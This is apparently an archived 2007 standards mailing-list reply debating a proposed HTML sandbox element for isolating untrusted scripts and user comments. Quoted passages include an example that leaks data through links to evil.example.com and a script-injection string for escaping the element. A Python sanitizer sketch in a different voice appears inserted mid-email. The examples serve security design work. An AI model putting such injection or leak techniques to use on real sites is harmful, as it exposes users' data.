- From: Alexey Feldgendler <alexey@feldgendler.ru>
- Date: Wed, 09 May 2007 02:05:19 +0200
On Tue, 08 May 2007 05:50:38 +0200, Ian Hickson <ian at hixie.ch> wrote:

>> 1. The entire thing has to degrade SAFELY in existing browsers. With your approach, any existing browser will just ignore the unknown "sandbox" attribute, effectively allowing the script to do anything. This is not acceptable.

> This probably depends on the use cases in question. For some use cases, the status quo is in fact the script running with full privileges, so while not being ideal, it is indeed acceptable; in other cases, you wouldn't want scripts to run at all if they weren't limited in some way.

A security feature, by definition, protects the users from a certain class of attacks. An attack needs to succeed in only one browser to do harm. For example, a malicious advertising script which steals passwords entered by users on the host page is dangerous enough even if the attacker only succeeds in stealing the passwords of a fraction of the users.

I can't really imagine a scenario in which sandbox restrictions could be considered optional. Wherever there is a need for such restrictions, it's unacceptable to run the script without them implemented.

> This is unfortunately far too complicated. It basically duplicates most of the <iframe> security and DOM model, which itself has been a big source of bugs over the years.

Yes, that's the idea (about the duplication, not about the bugs).

> Actually the origin-checking in browsers is simpler than that. It only happens at certain very specific places, namely the Window interface entry points. If we want to add a security model here, it has to be at the Window level, which basically means a new browsing context.

I should probably have named the element <browsingcontext>. The key differences from <iframe> are:

1. Doesn't require loading of a separate document via a separate HTTP request, and without the ugliness of data: URIs.
   If there were some "inline" version of <iframe>, such as <iframe>content</iframe>, that would be just fine.

2. Implements the security barrier even though the inner content doesn't come from a different domain. <iframe> would require a separate domain for that.

3. The security barrier is asymmetric, i.e. the outer scripts have access to the inner content, but not the other way round.

>> Of course, there is a lot more to think and talk about. I suppose there are going to be problems with particular buggy implementations of sandboxing and exploits specifically targeted at holes in such implementations. I suspect that web application authors and site administrators will be hesitant to allow user scripting even in sandboxes because of the possible browser bugs.

> Because of this, we really want to make sure we leverage as much of the existing infrastructure as possible. I'm worried that the DOMSandbox idea, with its "fake" documents, etc, introduces too much complexity.

You're drawing parallels between sandboxing and <iframe>. If the shortcomings of <iframe> listed above can be alleviated, it would be just fine.

>> I propose to define the notion of "side effect free script". All browsers which allow scripts in declarations like CSS should only allow side effect free scripts in such places.
>> 2. It can call any non-native function, but the same restrictions apply.

> So it can get hold of data that the rest of the page has created, or is storing in its temporary variables (e.g. it can get hold of your calendar data if you're looking at an online calendar application).

No, it's impossible to store any data permanently in a thread which is in SEF mode. Only locals can be assigned, and they aren't going to last longer than the thread anyway.

> With the above you could still do something like:
>
>    <a style="display: expression(...)"
>       href="http://evil.example.com?a">a</a>
>    <a style="display: expression(...)"
>       href="http://evil.example.com?b">b</a>
>
> ...where the first "..." script returns 'none' to convey one piece of information and 'block' to convey another, and the second is the reverse; the user who clicks on the link then exposes the bit of information the script was trying to steal. I'm sure there are more powerful attacks as well, e.g. using href=javascript: to return an HTML page with script.

Even easier: background: url(expression(...)). I see your point.

> In short, the complexity is high, as is the risk that it isn't comprehensive. Also, it seems to me that most scripts want to do something more fancy. For example, a calendar widget will want to talk to its server, render new DOMs, interact with the user, etc. What's the use case for these scripts? Are they common enough to warrant their own security model?

It's not for most scripts. It's basically only for expression() in CSS, which is generally a good thing, if only it can be made impossible to use it for bad purposes. And this whole SEF idea is not really relevant to sandboxing.

>> Frames are a terrible solution. The content is after all a part of the page it's hosted in, but we want to sandbox it to make sure it can't do any harm.
>>
>> Let's say we'd like to sandbox anonymous user-contributed comments on a blog, but not comments from logged in users. That would require all anonymous comments to be placed within an iframe. For 100 anonymous comments, that's 100 iframes on a single web page. Don't tell me that's an elegant solution.

> Why not? Or rather, why is a 100 <sandbox> frames (or whatever) better?

1. Because it doesn't require 100 HTTP requests to load the page.

2. Because it doesn't require a separate domain to serve the iframe content from.
These two are major, and there are also several minor issues (some sizing problems with iframes, as pointed out by Charles; stylesheet propagation into sandboxes; strict symmetry of restrictions on iframes).

> We can't do something like this:
>
>    <body>
>     <p>Hello, you said:
>      <sandbox>Hello World</sandbox>
>     </p>
>    </body>
>
> ...because nothing stops the user from inserting "</sandbox>" into the string -- e.g. if the user tried to insert "</sandbox><script>alert(window.cookie)</script>" the result would be:

All attempts to treat user-submitted HTML as a string are doomed to have such vulnerabilities. <sandbox> alone doesn't add much to this problem. Just look at how complex the HTML sanitizer in LiveJournal is, which allows some user-submitted markup but not all.

The only ultimate solution here is to parse the user-submitted HTML with an HTML5 parser and reserialize it. The string "</sandbox><script>alert(window.cookie)</script>" would parse into one <script> element with a text node inside (the stray </sandbox> at the start gets ignored), and reserialize as "<script>alert(window.cookie)</script>". That's the only reasonable way (apart from completely escaping all <>"& characters) to include ANY user-submitted string into generated HTML, with or without <sandbox>.

> The sanest way I can see of limiting scripting is to give it its own browsing context (aka scripting context, or global scope). Anything short of this would make the security model overly complicated -- the security model is what we want to keep at its simplest, as I've said several times in this e-mail.

<sandbox> would indeed be one, just with the content supplied inline.

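To make the parse-and-reserialize idea above concrete, here is a minimal sketch in Python. It is only an illustration under loud assumptions: the standard library's html.parser is NOT an HTML5 parser, so the stray-end-tag handling below merely approximates what a conforming parser would do, and the names Reserializer, reserialize and escape_all are hypothetical helpers invented for this example. The second function shows the simpler alternative mentioned in the same paragraph, escaping every markup-significant character.

```python
from html import escape
from html.parser import HTMLParser

# Elements that never take an end tag.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}
# Elements whose text content is emitted verbatim rather than escaped.
RAW_TEXT = {"script", "style"}


class Reserializer(HTMLParser):
    """Hypothetical helper: rebuilds markup from parse events.

    Assumption: html.parser only approximates HTML5 tree construction.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []    # serialized pieces, joined at the end
        self.stack = []  # currently open elements

    def handle_starttag(self, tag, attrs):
        rendered = "".join(
            f' {name}="{escape(value or "", quote=True)}"'
            for name, value in attrs
        )
        self.out.append(f"<{tag}{rendered}>")
        if tag not in VOID:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.stack:
            return  # stray end tag such as "</sandbox>": drop it
        # Close everything opened since the matching start tag.
        while self.stack:
            open_tag = self.stack.pop()
            self.out.append(f"</{open_tag}>")
            if open_tag == tag:
                break

    def handle_data(self, data):
        in_raw_text = bool(self.stack) and self.stack[-1] in RAW_TEXT
        self.out.append(data if in_raw_text else escape(data, quote=False))

    def close_open_elements(self):
        # Balance any elements the input left open.
        while self.stack:
            self.out.append(f"</{self.stack.pop()}>")


def reserialize(fragment: str) -> str:
    """Parse a fragment and write it back out as balanced markup."""
    parser = Reserializer()
    parser.feed(fragment)
    parser.close()  # flush any buffered text
    parser.close_open_elements()
    return "".join(parser.out)


def escape_all(text: str) -> str:
    """The blunt alternative: escape every markup-significant character."""
    return escape(text, quote=True)


if __name__ == "__main__":
    hostile = "</sandbox><script>alert(window.cookie)</script>"
    print(reserialize(hostile))
    print(escape_all(hostile))
```

Note that the reserialized output still contains the <script> element. The point is only that the stray </sandbox> is gone, so the script can no longer break out of whatever element the generated page wraps around it.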
> This basically implies an <iframe>, again possibly with the data in a data: URI, and combined with a way to isolate the content in the <iframe> from the content of the parent browsing context:
>
>    <iframe
>     src="data:text/html;base64,PHA%2BVGhpcyBpcyBteSBzYW1wbGUgbWFya3VwITwvcD4%3D"
>     isolate-scripts
>    ></iframe>

data: URIs are maybe appropriate for a small list-bullet PNG, but not for a blog entry or comment. They are ugly and impossible to read and write without machine conversion. Any element that lets you write the HTML content inside, be it <iframe> or <sandbox> or something else, would be OK.

> The names above are a bit long; here's a summary of what the four modes could be:
>
>    seamless - if present, styles cascade through the browsing context boundary; ignored if the origin doesn't match the parent's.
>
>    noscript - disables all scripts in the embedded page
>
>    isolate - make the origin of the file not match the parent's, regardless of the real origins
>
>    restrict - disable certain APIs in the browsing context

These make a nice list of toggle attributes for the <sandbox> element.

--
Alexey Feldgendler <alexey at feldgendler.ru>
[ICQ: 115226275] http://feldgendler.livejournal.com
Received on Tuesday, 8 May 2007 17:05:19 UTC